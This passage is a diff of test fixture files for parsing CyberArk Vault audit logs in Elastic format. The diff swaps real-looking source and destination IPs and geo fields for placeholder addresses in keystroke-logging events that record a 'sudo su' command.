\u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:32:04\",\"IsoTimestamp\":\"2021-03-15T10:32:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -382,39 +338,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -431,7 +366,7 @@ }, "@timestamp": "2021-03-15T10:33:47.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -442,16 +377,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:33:47Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -465,14 +399,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -482,9 +416,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 03:33:47", "desc": "Keystroke logging" @@ -495,8 +429,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191939300Z", - "original": "\u003c5\u003e1 2021-03-15T10:33:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:47\",\"IsoTimestamp\":\"2021-03-15T10:33:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165109400Z", + "original": "\u003c5\u003e1 2021-03-15T10:33:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:47\",\"IsoTimestamp\":\"2021-03-15T10:33:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -518,39 +452,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -567,7 +480,7 @@ }, "@timestamp": "2021-03-15T10:35:08.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -578,16 +491,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:35:08Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n 